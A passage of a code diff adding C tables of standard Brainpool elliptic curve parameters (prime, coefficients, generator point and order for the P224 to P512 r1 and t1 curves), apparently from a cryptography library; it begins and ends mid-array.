+        0xC1, 0x53, 0x0B, 0x51, 0x4E, 0x18, 0x2A, 0xD8, 0xB0, 0x04, 0x2A, 0x59,
+        0xCA, 0xD2, 0x9F, 0x43,
+        /* b */
+        0x25, 0x80, 0xF6, 0x3C, 0xCF, 0xE4, 0x41, 0x38, 0x87, 0x07, 0x13, 0xB1,
+        0xA9, 0x23, 0x69, 0xE3, 0x3E, 0x21, 0x35, 0xD2, 0x66, 0xDB, 0xB3, 0x72,
+        0x38, 0x6C, 0x40, 0x0B,
+        /* x */
+        0x0D, 0x90, 0x29, 0xAD, 0x2C, 0x7E, 0x5C, 0xF4, 0x34, 0x08, 0x23, 0xB2,
+        0xA8, 0x7D, 0xC6, 0x8C, 0x9E, 0x4C, 0xE3, 0x17, 0x4C, 0x1E, 0x6E, 0xFD,
+        0xEE, 0x12, 0xC0, 0x7D,
+        /* y */
+        0x58, 0xAA, 0x56, 0xF7, 0x72, 0xC0, 0x72, 0x6F, 0x24, 0xC6, 0xB8, 0x9E,
+        0x4E, 0xCD, 0xAC, 0x24, 0x35, 0x4B, 0x9E, 0x99, 0xCA, 0xA3, 0xF6, 0xD3,
+        0x76, 0x14, 0x02, 0xCD,
+        /* order */
+        0xD7, 0xC1, 0x34, 0xAA, 0x26, 0x43, 0x66, 0x86, 0x2A, 0x18, 0x30, 0x25,
+        0x75, 0xD0, 0xFB, 0x98, 0xD1, 0x16, 0xBC, 0x4B, 0x6D, 0xDE, 0xBC, 0xA3,
+        0xA5, 0xA7, 0x93, 0x9F
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 28 * 6];
+} _EC_brainpoolP224t1 = {
+    {
+        NID_X9_62_prime_field, 0, 28, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xD7, 0xC1, 0x34, 0xAA, 0x26, 0x43, 0x66, 0x86, 0x2A, 0x18, 0x30, 0x25,
+        0x75, 0xD1, 0xD7, 0x87, 0xB0, 0x9F, 0x07, 0x57, 0x97, 0xDA, 0x89, 0xF5,
+        0x7E, 0xC8, 0xC0, 0xFF,
+        /* a */
+        0xD7, 0xC1, 0x34, 0xAA, 0x26, 0x43, 0x66, 0x86, 0x2A, 0x18, 0x30, 0x25,
+        0x75, 0xD1, 0xD7, 0x87, 0xB0, 0x9F, 0x07, 0x57, 0x97, 0xDA, 0x89, 0xF5,
+        0x7E, 0xC8, 0xC0, 0xFC,
+        /* b */
+        0x4B, 0x33, 0x7D, 0x93, 0x41, 0x04, 0xCD, 0x7B, 0xEF, 0x27, 0x1B, 0xF6,
+        0x0C, 0xED, 0x1E, 0xD2, 0x0D, 0xA1, 0x4C, 0x08, 0xB3, 0xBB, 0x64, 0xF1,
+        0x8A, 0x60, 0x88, 0x8D,
+        /* x */
+        0x6A, 0xB1, 0xE3, 0x44, 0xCE, 0x25, 0xFF, 0x38, 0x96, 0x42, 0x4E, 0x7F,
+        0xFE, 0x14, 0x76, 0x2E, 0xCB, 0x49, 0xF8, 0x92, 0x8A, 0xC0, 0xC7, 0x60,
+        0x29, 0xB4, 0xD5, 0x80,
+        /* y */
+        0x03, 0x74, 0xE9, 0xF5, 0x14, 0x3E, 0x56, 0x8C, 0xD2, 0x3F, 0x3F, 0x4D,
+        0x7C, 0x0D, 0x4B, 0x1E, 0x41, 0xC8, 0xCC, 0x0D, 0x1C, 0x6A, 0xBD, 0x5F,
+        0x1A, 0x46, 0xDB, 0x4C,
+        /* order */
+        0xD7, 0xC1, 0x34, 0xAA, 0x26, 0x43, 0x66, 0x86, 0x2A, 0x18, 0x30, 0x25,
+        0x75, 0xD0, 0xFB, 0x98, 0xD1, 0x16, 0xBC, 0x4B, 0x6D, 0xDE, 0xBC, 0xA3,
+        0xA5, 0xA7, 0x93, 0x9F
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 32 * 6];
+} _EC_brainpoolP256r1 = {
+    {
+        NID_X9_62_prime_field, 0, 32, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xA9, 0xFB, 0x57, 0xDB, 0xA1, 0xEE, 0xA9, 0xBC, 0x3E, 0x66, 0x0A, 0x90,
+        0x9D, 0x83, 0x8D, 0x72, 0x6E, 0x3B, 0xF6, 0x23, 0xD5, 0x26, 0x20, 0x28,
+        0x20, 0x13, 0x48, 0x1D, 0x1F, 0x6E, 0x53, 0x77,
+        /* a */
+        0x7D, 0x5A, 0x09, 0x75, 0xFC, 0x2C, 0x30, 0x57, 0xEE, 0xF6, 0x75, 0x30,
+        0x41, 0x7A, 0xFF, 0xE7, 0xFB, 0x80, 0x55, 0xC1, 0x26, 0xDC, 0x5C, 0x6C,
+        0xE9, 0x4A, 0x4B, 0x44, 0xF3, 0x30, 0xB5, 0xD9,
+        /* b */
+        0x26, 0xDC, 0x5C, 0x6C, 0xE9, 0x4A, 0x4B, 0x44, 0xF3, 0x30, 0xB5, 0xD9,
+        0xBB, 0xD7, 0x7C, 0xBF, 0x95, 0x84, 0x16, 0x29, 0x5C, 0xF7, 0xE1, 0xCE,
+        0x6B, 0xCC, 0xDC, 0x18, 0xFF, 0x8C, 0x07, 0xB6,
+        /* x */
+        0x8B, 0xD2, 0xAE, 0xB9, 0xCB, 0x7E, 0x57, 0xCB, 0x2C, 0x4B, 0x48, 0x2F,
+        0xFC, 0x81, 0xB7, 0xAF, 0xB9, 0xDE, 0x27, 0xE1, 0xE3, 0xBD, 0x23, 0xC2,
+        0x3A, 0x44, 0x53, 0xBD, 0x9A, 0xCE, 0x32, 0x62,
+        /* y */
+        0x54, 0x7E, 0xF8, 0x35, 0xC3, 0xDA, 0xC4, 0xFD, 0x97, 0xF8, 0x46, 0x1A,
+        0x14, 0x61, 0x1D, 0xC9, 0xC2, 0x77, 0x45, 0x13, 0x2D, 0xED, 0x8E, 0x54,
+        0x5C, 0x1D, 0x54, 0xC7, 0x2F, 0x04, 0x69, 0x97,
+        /* order */
+        0xA9, 0xFB, 0x57, 0xDB, 0xA1, 0xEE, 0xA9, 0xBC, 0x3E, 0x66, 0x0A, 0x90,
+        0x9D, 0x83, 0x8D, 0x71, 0x8C, 0x39, 0x7A, 0xA3, 0xB5, 0x61, 0xA6, 0xF7,
+        0x90, 0x1E, 0x0E, 0x82, 0x97, 0x48, 0x56, 0xA7
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 32 * 6];
+} _EC_brainpoolP256t1 = {
+    {
+        NID_X9_62_prime_field, 0, 32, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xA9, 0xFB, 0x57, 0xDB, 0xA1, 0xEE, 0xA9, 0xBC, 0x3E, 0x66, 0x0A, 0x90,
+        0x9D, 0x83, 0x8D, 0x72, 0x6E, 0x3B, 0xF6, 0x23, 0xD5, 0x26, 0x20, 0x28,
+        0x20, 0x13, 0x48, 0x1D, 0x1F, 0x6E, 0x53, 0x77,
+        /* a */
+        0xA9, 0xFB, 0x57, 0xDB, 0xA1, 0xEE, 0xA9, 0xBC, 0x3E, 0x66, 0x0A, 0x90,
+        0x9D, 0x83, 0x8D, 0x72, 0x6E, 0x3B, 0xF6, 0x23, 0xD5, 0x26, 0x20, 0x28,
+        0x20, 0x13, 0x48, 0x1D, 0x1F, 0x6E, 0x53, 0x74,
+        /* b */
+        0x66, 0x2C, 0x61, 0xC4, 0x30, 0xD8, 0x4E, 0xA4, 0xFE, 0x66, 0xA7, 0x73,
+        0x3D, 0x0B, 0x76, 0xB7, 0xBF, 0x93, 0xEB, 0xC4, 0xAF, 0x2F, 0x49, 0x25,
+        0x6A, 0xE5, 0x81, 0x01, 0xFE, 0xE9, 0x2B, 0x04,
+        /* x */
+        0xA3, 0xE8, 0xEB, 0x3C, 0xC1, 0xCF, 0xE7, 0xB7, 0x73, 0x22, 0x13, 0xB2,
+        0x3A, 0x65, 0x61, 0x49, 0xAF, 0xA1, 0x42, 0xC4, 0x7A, 0xAF, 0xBC, 0x2B,
+        0x79, 0xA1, 0x91, 0x56, 0x2E, 0x13, 0x05, 0xF4,
+        /* y */
+        0x2D, 0x99, 0x6C, 0x82, 0x34, 0x39, 0xC5, 0x6D, 0x7F, 0x7B, 0x22, 0xE1,
+        0x46, 0x44, 0x41, 0x7E, 0x69, 0xBC, 0xB6, 0xDE, 0x39, 0xD0, 0x27, 0x00,
+        0x1D, 0xAB, 0xE8, 0xF3, 0x5B, 0x25, 0xC9, 0xBE,
+        /* order */
+        0xA9, 0xFB, 0x57, 0xDB, 0xA1, 0xEE, 0xA9, 0xBC, 0x3E, 0x66, 0x0A, 0x90,
+        0x9D, 0x83, 0x8D, 0x71, 0x8C, 0x39, 0x7A, 0xA3, 0xB5, 0x61, 0xA6, 0xF7,
+        0x90, 0x1E, 0x0E, 0x82, 0x97, 0x48, 0x56, 0xA7
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 40 * 6];
+} _EC_brainpoolP320r1 = {
+    {
+        NID_X9_62_prime_field, 0, 40, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xD3, 0x5E, 0x47, 0x20, 0x36, 0xBC, 0x4F, 0xB7, 0xE1, 0x3C, 0x78, 0x5E,
+        0xD2, 0x01, 0xE0, 0x65, 0xF9, 0x8F, 0xCF, 0xA6, 0xF6, 0xF4, 0x0D, 0xEF,
+        0x4F, 0x92, 0xB9, 0xEC, 0x78, 0x93, 0xEC, 0x28, 0xFC, 0xD4, 0x12, 0xB1,
+        0xF1, 0xB3, 0x2E, 0x27,
+        /* a */
+        0x3E, 0xE3, 0x0B, 0x56, 0x8F, 0xBA, 0xB0, 0xF8, 0x83, 0xCC, 0xEB, 0xD4,
+        0x6D, 0x3F, 0x3B, 0xB8, 0xA2, 0xA7, 0x35, 0x13, 0xF5, 0xEB, 0x79, 0xDA,
+        0x66, 0x19, 0x0E, 0xB0, 0x85, 0xFF, 0xA9, 0xF4, 0x92, 0xF3, 0x75, 0xA9,
+        0x7D, 0x86, 0x0E, 0xB4,
+        /* b */
+        0x52, 0x08, 0x83, 0x94, 0x9D, 0xFD, 0xBC, 0x42, 0xD3, 0xAD, 0x19, 0x86,
+        0x40, 0x68, 0x8A, 0x6F, 0xE1, 0x3F, 0x41, 0x34, 0x95, 0x54, 0xB4, 0x9A,
+        0xCC, 0x31, 0xDC, 0xCD, 0x88, 0x45, 0x39, 0x81, 0x6F, 0x5E, 0xB4, 0xAC,
+        0x8F, 0xB1, 0xF1, 0xA6,
+        /* x */
+        0x43, 0xBD, 0x7E, 0x9A, 0xFB, 0x53, 0xD8, 0xB8, 0x52, 0x89, 0xBC, 0xC4,
+        0x8E, 0xE5, 0xBF, 0xE6, 0xF2, 0x01, 0x37, 0xD1, 0x0A, 0x08, 0x7E, 0xB6,
+        0xE7, 0x87, 0x1E, 0x2A, 0x10, 0xA5, 0x99, 0xC7, 0x10, 0xAF, 0x8D, 0x0D,
+        0x39, 0xE2, 0x06, 0x11,
+        /* y */
+        0x14, 0xFD, 0xD0, 0x55, 0x45, 0xEC, 0x1C, 0xC8, 0xAB, 0x40, 0x93, 0x24,
+        0x7F, 0x77, 0x27, 0x5E, 0x07, 0x43, 0xFF, 0xED, 0x11, 0x71, 0x82, 0xEA,
+        0xA9, 0xC7, 0x78, 0x77, 0xAA, 0xAC, 0x6A, 0xC7, 0xD3, 0x52, 0x45, 0xD1,
+        0x69, 0x2E, 0x8E, 0xE1,
+        /* order */
+        0xD3, 0x5E, 0x47, 0x20, 0x36, 0xBC, 0x4F, 0xB7, 0xE1, 0x3C, 0x78, 0x5E,
+        0xD2, 0x01, 0xE0, 0x65, 0xF9, 0x8F, 0xCF, 0xA5, 0xB6, 0x8F, 0x12, 0xA3,
+        0x2D, 0x48, 0x2E, 0xC7, 0xEE, 0x86, 0x58, 0xE9, 0x86, 0x91, 0x55, 0x5B,
+        0x44, 0xC5, 0x93, 0x11
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 40 * 6];
+} _EC_brainpoolP320t1 = {
+    {
+        NID_X9_62_prime_field, 0, 40, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xD3, 0x5E, 0x47, 0x20, 0x36, 0xBC, 0x4F, 0xB7, 0xE1, 0x3C, 0x78, 0x5E,
+        0xD2, 0x01, 0xE0, 0x65, 0xF9, 0x8F, 0xCF, 0xA6, 0xF6, 0xF4, 0x0D, 0xEF,
+        0x4F, 0x92, 0xB9, 0xEC, 0x78, 0x93, 0xEC, 0x28, 0xFC, 0xD4, 0x12, 0xB1,
+        0xF1, 0xB3, 0x2E, 0x27,
+        /* a */
+        0xD3, 0x5E, 0x47, 0x20, 0x36, 0xBC, 0x4F, 0xB7, 0xE1, 0x3C, 0x78, 0x5E,
+        0xD2, 0x01, 0xE0, 0x65, 0xF9, 0x8F, 0xCF, 0xA6, 0xF6, 0xF4, 0x0D, 0xEF,
+        0x4F, 0x92, 0xB9, 0xEC, 0x78, 0x93, 0xEC, 0x28, 0xFC, 0xD4, 0x12, 0xB1,
+        0xF1, 0xB3, 0x2E, 0x24,
+        /* b */
+        0xA7, 0xF5, 0x61, 0xE0, 0x38, 0xEB, 0x1E, 0xD5, 0x60, 0xB3, 0xD1, 0x47,
+        0xDB, 0x78, 0x20, 0x13, 0x06, 0x4C, 0x19, 0xF2, 0x7E, 0xD2, 0x7C, 0x67,
+        0x80, 0xAA, 0xF7, 0x7F, 0xB8, 0xA5, 0x47, 0xCE, 0xB5, 0xB4, 0xFE, 0xF4,
+        0x22, 0x34, 0x03, 0x53,
+        /* x */
+        0x92, 0x5B, 0xE9, 0xFB, 0x01, 0xAF, 0xC6, 0xFB, 0x4D, 0x3E, 0x7D, 0x49,
+        0x90, 0x01, 0x0F, 0x81, 0x34, 0x08, 0xAB, 0x10, 0x6C, 0x4F, 0x09, 0xCB,
+        0x7E, 0xE0, 0x78, 0x68, 0xCC, 0x13, 0x6F, 0xFF, 0x33, 0x57, 0xF6, 0x24,
+        0xA2, 0x1B, 0xED, 0x52,
+        /* y */
+        0x63, 0xBA, 0x3A, 0x7A, 0x27, 0x48, 0x3E, 0xBF, 0x66, 0x71, 0xDB, 0xEF,
+        0x7A, 0xBB, 0x30, 0xEB, 0xEE, 0x08, 0x4E, 0x58, 0xA0, 0xB0, 0x77, 0xAD,
+        0x42, 0xA5, 0xA0, 0x98, 0x9D, 0x1E, 0xE7, 0x1B, 0x1B, 0x9B, 0xC0, 0x45,
+        0x5F, 0xB0, 0xD2, 0xC3,
+        /* order */
+        0xD3, 0x5E, 0x47, 0x20, 0x36, 0xBC, 0x4F, 0xB7, 0xE1, 0x3C, 0x78, 0x5E,
+        0xD2, 0x01, 0xE0, 0x65, 0xF9, 0x8F, 0xCF, 0xA5, 0xB6, 0x8F, 0x12, 0xA3,
+        0x2D, 0x48, 0x2E, 0xC7, 0xEE, 0x86, 0x58, 0xE9, 0x86, 0x91, 0x55, 0x5B,
+        0x44, 0xC5, 0x93, 0x11
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 48 * 6];
+} _EC_brainpoolP384r1 = {
+    {
+        NID_X9_62_prime_field, 0, 48, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x8C, 0xB9, 0x1E, 0x82, 0xA3, 0x38, 0x6D, 0x28, 0x0F, 0x5D, 0x6F, 0x7E,
+        0x50, 0xE6, 0x41, 0xDF, 0x15, 0x2F, 0x71, 0x09, 0xED, 0x54, 0x56, 0xB4,
+        0x12, 0xB1, 0xDA, 0x19, 0x7F, 0xB7, 0x11, 0x23, 0xAC, 0xD3, 0xA7, 0x29,
+        0x90, 0x1D, 0x1A, 0x71, 0x87, 0x47, 0x00, 0x13, 0x31, 0x07, 0xEC, 0x53,
+        /* a */
+        0x7B, 0xC3, 0x82, 0xC6, 0x3D, 0x8C, 0x15, 0x0C, 0x3C, 0x72, 0x08, 0x0A,
+        0xCE, 0x05, 0xAF, 0xA0, 0xC2, 0xBE, 0xA2, 0x8E, 0x4F, 0xB2, 0x27, 0x87,
+        0x13, 0x91, 0x65, 0xEF, 0xBA, 0x91, 0xF9, 0x0F, 0x8A, 0xA5, 0x81, 0x4A,
+        0x50, 0x3A, 0xD4, 0xEB, 0x04, 0xA8, 0xC7, 0xDD, 0x22, 0xCE, 0x28, 0x26,
+        /* b */
+        0x04, 0xA8, 0xC7, 0xDD, 0x22, 0xCE, 0x28, 0x26, 0x8B, 0x39, 0xB5, 0x54,
+        0x16, 0xF0, 0x44, 0x7C, 0x2F, 0xB7, 0x7D, 0xE1, 0x07, 0xDC, 0xD2, 0xA6,
+        0x2E, 0x88, 0x0E, 0xA5, 0x3E, 0xEB, 0x62, 0xD5, 0x7C, 0xB4, 0x39, 0x02,
+        0x95, 0xDB, 0xC9, 0x94, 0x3A, 0xB7, 0x86, 0x96, 0xFA, 0x50, 0x4C, 0x11,
+        /* x */
+        0x1D, 0x1C, 0x64, 0xF0, 0x68, 0xCF, 0x45, 0xFF, 0xA2, 0xA6, 0x3A, 0x81,
+        0xB7, 0xC1, 0x3F, 0x6B, 0x88, 0x47, 0xA3, 0xE7, 0x7E, 0xF1, 0x4F, 0xE3,
+        0xDB, 0x7F, 0xCA, 0xFE, 0x0C, 0xBD, 0x10, 0xE8, 0xE8, 0x26, 0xE0, 0x34,
+        0x36, 0xD6, 0x46, 0xAA, 0xEF, 0x87, 0xB2, 0xE2, 0x47, 0xD4, 0xAF, 0x1E,
+        /* y */
+        0x8A, 0xBE, 0x1D, 0x75, 0x20, 0xF9, 0xC2, 0xA4, 0x5C, 0xB1, 0xEB, 0x8E,
+        0x95, 0xCF, 0xD5, 0x52, 0x62, 0xB7, 0x0B, 0x29, 0xFE, 0xEC, 0x58, 0x64,
+        0xE1, 0x9C, 0x05, 0x4F, 0xF9, 0x91, 0x29, 0x28, 0x0E, 0x46, 0x46, 0x21,
+        0x77, 0x91, 0x81, 0x11, 0x42, 0x82, 0x03, 0x41, 0x26, 0x3C, 0x53, 0x15,
+        /* order */
+        0x8C, 0xB9, 0x1E, 0x82, 0xA3, 0x38, 0x6D, 0x28, 0x0F, 0x5D, 0x6F, 0x7E,
+        0x50, 0xE6, 0x41, 0xDF, 0x15, 0x2F, 0x71, 0x09, 0xED, 0x54, 0x56, 0xB3,
+        0x1F, 0x16, 0x6E, 0x6C, 0xAC, 0x04, 0x25, 0xA7, 0xCF, 0x3A, 0xB6, 0xAF,
+        0x6B, 0x7F, 0xC3, 0x10, 0x3B, 0x88, 0x32, 0x02, 0xE9, 0x04, 0x65, 0x65
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 48 * 6];
+} _EC_brainpoolP384t1 = {
+    {
+        NID_X9_62_prime_field, 0, 48, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x8C, 0xB9, 0x1E, 0x82, 0xA3, 0x38, 0x6D, 0x28, 0x0F, 0x5D, 0x6F, 0x7E,
+        0x50, 0xE6, 0x41, 0xDF, 0x15, 0x2F, 0x71, 0x09, 0xED, 0x54, 0x56, 0xB4,
+        0x12, 0xB1, 0xDA, 0x19, 0x7F, 0xB7, 0x11, 0x23, 0xAC, 0xD3, 0xA7, 0x29,
+        0x90, 0x1D, 0x1A, 0x71, 0x87, 0x47, 0x00, 0x13, 0x31, 0x07, 0xEC, 0x53,
+        /* a */
+        0x8C, 0xB9, 0x1E, 0x82, 0xA3, 0x38, 0x6D, 0x28, 0x0F, 0x5D, 0x6F, 0x7E,
+        0x50, 0xE6, 0x41, 0xDF, 0x15, 0x2F, 0x71, 0x09, 0xED, 0x54, 0x56, 0xB4,
+        0x12, 0xB1, 0xDA, 0x19, 0x7F, 0xB7, 0x11, 0x23, 0xAC, 0xD3, 0xA7, 0x29,
+        0x90, 0x1D, 0x1A, 0x71, 0x87, 0x47, 0x00, 0x13, 0x31, 0x07, 0xEC, 0x50,
+        /* b */
+        0x7F, 0x51, 0x9E, 0xAD, 0xA7, 0xBD, 0xA8, 0x1B, 0xD8, 0x26, 0xDB, 0xA6,
+        0x47, 0x91, 0x0F, 0x8C, 0x4B, 0x93, 0x46, 0xED, 0x8C, 0xCD, 0xC6, 0x4E,
+        0x4B, 0x1A, 0xBD, 0x11, 0x75, 0x6D, 0xCE, 0x1D, 0x20, 0x74, 0xAA, 0x26,
+        0x3B, 0x88, 0x80, 0x5C, 0xED, 0x70, 0x35, 0x5A, 0x33, 0xB4, 0x71, 0xEE,
+        /* x */
+        0x18, 0xDE, 0x98, 0xB0, 0x2D, 0xB9, 0xA3, 0x06, 0xF2, 0xAF, 0xCD, 0x72,
+        0x35, 0xF7, 0x2A, 0x81, 0x9B, 0x80, 0xAB, 0x12, 0xEB, 0xD6, 0x53, 0x17,
+        0x24, 0x76, 0xFE, 0xCD, 0x46, 0x2A, 0xAB, 0xFF, 0xC4, 0xFF, 0x19, 0x1B,
+        0x94, 0x6A, 0x5F, 0x54, 0xD8, 0xD0, 0xAA, 0x2F, 0x41, 0x88, 0x08, 0xCC,
+        /* y */
+        0x25, 0xAB, 0x05, 0x69, 0x62, 0xD3, 0x06, 0x51, 0xA1, 0x14, 0xAF, 0xD2,
+        0x75, 0x5A, 0xD3, 0x36, 0x74, 0x7F, 0x93, 0x47, 0x5B, 0x7A, 0x1F, 0xCA,
+        0x3B, 0x88, 0xF2, 0xB6, 0xA2, 0x08, 0xCC, 0xFE, 0x46, 0x94, 0x08, 0x58,
+        0x4D, 0xC2, 0xB2, 0x91, 0x26, 0x75, 0xBF, 0x5B, 0x9E, 0x58, 0x29, 0x28,
+        /* order */
+        0x8C, 0xB9, 0x1E, 0x82, 0xA3, 0x38, 0x6D, 0x28, 0x0F, 0x5D, 0x6F, 0x7E,
+        0x50, 0xE6, 0x41, 0xDF, 0x15, 0x2F, 0x71, 0x09, 0xED, 0x54, 0x56, 0xB3,
+        0x1F, 0x16, 0x6E, 0x6C, 0xAC, 0x04, 0x25, 0xA7, 0xCF, 0x3A, 0xB6, 0xAF,
+        0x6B, 0x7F, 0xC3, 0x10, 0x3B, 0x88, 0x32, 0x02, 0xE9, 0x04, 0x65, 0x65
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 64 * 6];
+} _EC_brainpoolP512r1 = {
+    {
+        NID_X9_62_prime_field, 0, 64, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xAA, 0xDD, 0x9D, 0xB8, 0xDB, 0xE9, 0xC4, 0x8B, 0x3F, 0xD4, 0xE6, 0xAE,
+        0x33, 0xC9, 0xFC, 0x07, 0xCB, 0x30, 0x8D, 0xB3, 0xB3, 0xC9, 0xD2, 0x0E,
+        0xD6, 0x63, 0x9C, 0xCA, 0x70, 0x33, 0x08, 0x71, 0x7D, 0x4D, 0x9B, 0x00,
+        0x9B, 0xC6, 0x68, 0x42, 0xAE, 0xCD, 0xA1, 0x2A, 0xE6, 0xA3, 0x80, 0xE6,
+        0x28, 0x81, 0xFF, 0x2F, 0x2D, 0x82, 0xC6, 0x85, 0x28, 0xAA, 0x60, 0x56,
+        0x58, 0x3A, 0x48, 0xF3,
+        /* a */
+        0x78, 0x30, 0xA3, 0x31, 0x8B, 0x60, 0x3B, 0x89, 0xE2, 0x32, 0x71, 0x45,
+        0xAC, 0x23, 0x4C, 0xC5, 0x94, 0xCB, 0xDD, 0x8D, 0x3D, 0xF9, 0x16, 0x10,
+        0xA8, 0x34, 0x41, 0xCA, 0xEA, 0x98, 0x63, 0xBC, 0x2D, 0xED, 0x5D, 0x5A,
+        0xA8, 0x25, 0x3A, 0xA1, 0x0A, 0x2E, 0xF1, 0xC9, 0x8B, 0x9A, 0xC8, 0xB5,
+        0x7F, 0x11, 0x17, 0xA7, 0x2B, 0xF2, 0xC7, 0xB9, 0xE7, 0xC1, 0xAC, 0x4D,
+        0x77, 0xFC, 0x94, 0xCA,
+        /* b */
+        0x3D, 0xF9, 0x16, 0x10, 0xA8, 0x34, 0x41, 0xCA, 0xEA, 0x98, 0x63, 0xBC,
+        0x2D, 0xED, 0x5D, 0x5A, 0xA8, 0x25, 0x3A, 0xA1, 0x0A, 0x2E, 0xF1, 0xC9,
+        0x8B, 0x9A, 0xC8, 0xB5, 0x7F, 0x11, 0x17, 0xA7, 0x2B, 0xF2, 0xC7, 0xB9,
+        0xE7, 0xC1, 0xAC, 0x4D, 0x77, 0xFC, 0x94, 0xCA, 0xDC, 0x08, 0x3E, 0x67,
+        0x98, 0x40, 0x50, 0xB7, 0x5E, 0xBA, 0xE5, 0xDD, 0x28, 0x09, 0xBD, 0x63,
+        0x80, 0x16, 0xF7, 0x23,
+        /* x */
+        0x81, 0xAE, 0xE4, 0xBD, 0xD8, 0x2E, 0xD9, 0x64, 0x5A, 0x21, 0x32, 0x2E,
+        0x9C, 0x4C, 0x6A, 0x93, 0x85, 0xED, 0x9F, 0x70, 0xB5, 0xD9, 0x16, 0xC1,
+        0xB4, 0x3B, 0x62, 0xEE, 0xF4, 0xD0, 0x09, 0x8E, 0xFF, 0x3B, 0x1F, 0x78,
+        0xE2, 0xD0, 0xD4, 0x8D, 0x50, 0xD1, 0x68, 0x7B, 0x93, 0xB9, 0x7D, 0x5F,
+        0x7C, 0x6D, 0x50, 0x47, 0x40, 0x6A, 0x5E, 0x68, 0x8B, 0x35, 0x22, 0x09,
+        0xBC, 0xB9, 0xF8, 0x22,
+        /* y */
+        0x7D, 0xDE, 0x38, 0x5D, 0x56, 0x63, 0x32, 0xEC, 0xC0, 0xEA, 0xBF, 0xA9,
+        0xCF, 0x78, 0x22, 0xFD, 0xF2, 0x09, 0xF7, 0x00, 0x24, 0xA5, 0x7B, 0x1A,
+        0xA0, 0x00, 0xC5, 0x5B, 0x88, 0x1F, 0x81, 0x11, 0xB2, 0xDC, 0xDE, 0x49,
+        0x4A, 0x5F, 0x48, 0x5E, 0x5B, 0xCA, 0x4B, 0xD8, 0x8A, 0x27, 0x63, 0xAE,
+        0xD1, 0xCA, 0x2B, 0x2F, 0xA8, 0xF0, 0x54, 0x06, 0x78, 0xCD, 0x1E, 0x0F,
+        0x3A, 0xD8, 0x08, 0x92,
+        /* order */
+        0xAA, 0xDD, 0x9D, 0xB8, 0xDB, 0xE9, 0xC4, 0x8B, 0x3F, 0xD4, 0xE6, 0xAE,
+        0x33, 0xC9, 0xFC, 0x07, 0xCB, 0x30, 0x8D, 0xB3, 0xB3, 0xC9, 0xD2, 0x0E,
+        0xD6, 0x63, 0x9C, 0xCA, 0x70, 0x33, 0x08, 0x70, 0x55, 0x3E, 0x5C, 0x41,
+        0x4C, 0xA9, 0x26, 0x19, 0x41, 0x86, 0x61, 0x19, 0x7F, 0xAC, 0x10, 0x47,
+        0x1D, 0xB1, 0xD3, 0x81, 0x08, 0x5D, 0xDA, 0xDD, 0xB5, 0x87, 0x96, 0x82,
+        0x9C, 0xA9, 0x00, 0x69
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 64 * 6];
+} _EC_brainpoolP512t1 = {
+    {
+        NID_X9_62_prime_field, 0, 64, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xAA, 0xDD, 0x9D, 0xB8, 0xDB, 0xE9, 0xC4, 0x8B, 0x3F, 0xD4, 0xE6, 0xAE,
+        0x33, 0xC9, 0xFC, 0x07, 0xCB, 0x30, 0x8D, 0xB3, 0xB3, 0xC9, 0xD2, 0x0E,
+        0xD6, 0x63, 0x9C, 0xCA, 0x70, 0x33, 0x08, 0x71, 0x7D, 0x4D, 0x9B, 0x00,
+        0x9B, 0xC6, 0x68, 0x42, 0xAE, 0xCD, 0xA1, 0x2A, 0xE6, 0xA3, 0x80, 0xE6,
+        0x28, 0x81, 0xFF, 0x2F, 0x2D, 0x82, 0xC6, 0x85, 0x28, 0xAA, 0x60, 0x56,
+        0x58, 0x3A, 0x48, 0xF3,
+        /* a */
+        0xAA, 0xDD, 0x9D, 0xB8, 0xDB, 0xE9, 0xC4, 0x8B, 0x3F, 0xD4, 0xE6, 0xAE,
+        0x33, 0xC9, 0xFC, 0x07, 0xCB, 0x30, 0x8D, 0xB3, 0xB3, 0xC9, 0xD2, 0x0E,
+        0xD6, 0x63, 0x9C, 0xCA, 0x70, 0x33, 0x08, 0x71, 0x7D, 0x4D, 0x9B, 0x00,
+        0x9B, 0xC6, 0x68, 0x42, 0xAE, 0xCD, 0xA1, 0x2A, 0xE6, 0xA3, 0x80, 0xE6,
+        0x28, 0x81, 0xFF, 0x2F, 0x2D, 0x82, 0xC6, 0x85, 0x28, 0xAA, 0x60, 0x56,
+        0x58, 0x3A, 0x48, 0xF0,
+        /* b */
+        0x7C, 0xBB, 0xBC, 0xF9, 0x44, 0x1C, 0xFA, 0xB7, 0x6E, 0x18, 0x90, 0xE4,
+        0x68, 0x84, 0xEA, 0xE3, 0x21, 0xF7, 0x0C, 0x0B, 0xCB, 0x49, 0x81, 0x52,
+        0x78, 0x97, 0x50, 0x4B, 0xEC, 0x3E, 0x36, 0xA6, 0x2B, 0xCD, 0xFA, 0x23,
+        0x04, 0x97, 0x65, 0x40, 0xF6, 0x45, 0x00, 0x85, 0xF2, 0xDA, 0xE1, 0x45,
+        0xC2, 0x25, 0x53, 0xB4, 0x65, 0x76, 0x36, 0x89, 0x18, 0x0E, 0xA2, 0x57,
+        0x18, 0x67, 0x42, 0x3E,
+        /* x */
+        0x64, 0x0E, 0xCE, 0x5C, 0x12, 0x78, 0x87, 0x17, 0xB9, 0xC1, 0xBA, 0x06,
+        0xCB, 0xC2, 0xA6, 0xFE, 0xBA, 0x85, 0x84, 0x24, 0x58, 0xC5, 0x6D, 0xDE,
